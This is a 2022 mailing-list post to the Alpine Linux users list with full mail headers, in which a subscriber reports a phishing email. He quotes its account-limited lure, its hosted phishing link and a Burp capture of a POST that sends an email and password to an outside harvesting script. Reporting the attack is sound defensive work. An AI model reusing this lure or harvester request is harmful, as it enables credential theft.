Received: from gw1.hafenthal.de (gw1.hafenthal.de [212.185.86.82]) by nld3-dev1.alpinelinux.org (Postfix) with ESMTPS id 444F6780774 for <~alpine/users@lists.alpinelinux.org>; Sat, 8 Oct 2022 12:03:52 +0000 (UTC) Received: from MAILRELAY-RZ.hafenthal.de (localhost.localdomain [127.0.0.1]) by MAILRELAY-RZ.hafenthal.de (Postfix) with ESMTPS id 5FD13A80B96 for <~alpine/users@lists.alpinelinux.org>; Sat, 8 Oct 2022 12:03:51 +0000 (UTC) Received: from GROUPWARE-S18.hafenthal.de (GROUPWARE-S18.hafenthal.de [10.18.8.20]) by gw1.hafenthal.de (Postfix) with ESMTPS id 439E3A8071B for <~alpine/users@lists.alpinelinux.org>; Sat, 8 Oct 2022 12:03:51 +0000 (UTC) Received: from localhost (localhost [127.0.0.1]) by GROUPWARE-S18.hafenthal.de (Postfix) with ESMTP id C1D2B20995 for <~alpine/users@lists.alpinelinux.org>; Sat, 8 Oct 2022 14:03:50 +0200 (CEST) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=hafenthal.de; h= content-transfer-encoding:subject:from:to:mime-version:date :message-id; s=dkim1; t=1665230629; x=1667045030; bh=yC5yVyDrmH/ Woio/0oGtVR25w7I812uCJZERd2fvGsg=; b=aev+ZSFe0cbGYBn1JsNjdrxWkbb Kyy3fqu7lQ768srrOjm8C2+Bp7m/R/JUmEwigM48Qwk5fdzgRZfEWt31uRLEUGri ByZLk0xbIS9wYsdCYh50iBUmdPdGc5Fgp+cL8PJYdDR34Hz5mKoVy4DT3C2/xTtR Tzcdnw7Is90CVlRc= X-Virus-Scanned: Debian amavisd-new at GROUPWARE-S18.hafenthal.de Received: from GROUPWARE-S18.hafenthal.de ([127.0.0.1]) by localhost (groupware-s18.hafenthal.de [127.0.0.1]) (amavisd-new, port 10041) with ESMTP id 5RAZzRG_Ak7z for <~alpine/users@lists.alpinelinux.org>; Sat, 8 Oct 2022 14:03:49 +0200 (CEST) Received: from [10.18.16.35] (DTR15.hafenthal.de [10.18.16.35]) by GROUPWARE-S18.hafenthal.de (Postfix) with ESMTPSA id E8DBA2020F for <~alpine/users@lists.alpinelinux.org>; Sat, 8 Oct 2022 14:03:48 +0200 (CEST) Message-ID: <3530b06a-bf3b-a3ef-ecce-1162bea953df@hafenthal.de> Date: Sat, 8 Oct 2022 14:03:48 +0200 MIME-Version: 1.0 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Thunderbird/102.3.0 Content-Language: en-US, de-DE To: ~alpine/users@lists.alpinelinux.org From: Stefan Hartmann Organization: Ingenieurbuero Hartmann Subject: =?UTF-8?Q?Your_account_associated_with_your=c3=82_alpine-user=40lis?= =?UTF-8?Q?ts=2ealpinelinux=2eorg_has_been_limited_Reason_=2e=2e=2e?= Content-Type: text/plain; charset=UTF-8; format=flowed Content-Transfer-Encoding: 8bit Hello, yesterday I received a suspicious email from alpinelinux.org: "Notification Dear alpine-user,Your account associated with your alpine-user@lists.alpinelinux.org has been limitedReason: Messages - Delivery Process Failed . What happens when new messages are inaccessible? Once a new message is limited, it will be inaccessible—users will not be able to receive new messages. Want to keep the account and receive new messages? ..." There is a pushbutton which yields to https://siasky.net/EABzry9_94YhAghJPa5QmmPjGdw01d_BAgdPmQJCkk0vlA#alpine-user@lists.alpinelinux.org I analyzed this with burp: The pushbutton makes a post POST //img/Jesse.php HTTP/1.1 Host: ommarts.com ... email=alpine-user%40lists.alpinelinux.org&password=spearphising%3F It returns a 200 OK. Uses alpinelinux.org really the php-script http://ommarts.com//img/Jesse.php ??? Suspicious! The messages comes from ... Received: from nld3-dev1.alpinelinux.org (nld3-dev1.alpinelinux.org [147.75.101.119]) by gw1.hafenthal.de (Postfix) with ESMTPS id 0D51BA80B87 for ; Fri, 7 Oct 2022 20:24:23 +0000 (UTC) ... which seams OK. Nb. received on a Alpinelinux mailrelay! Was there a breach? -- Stefan Hartmann - ib.hafenthal.de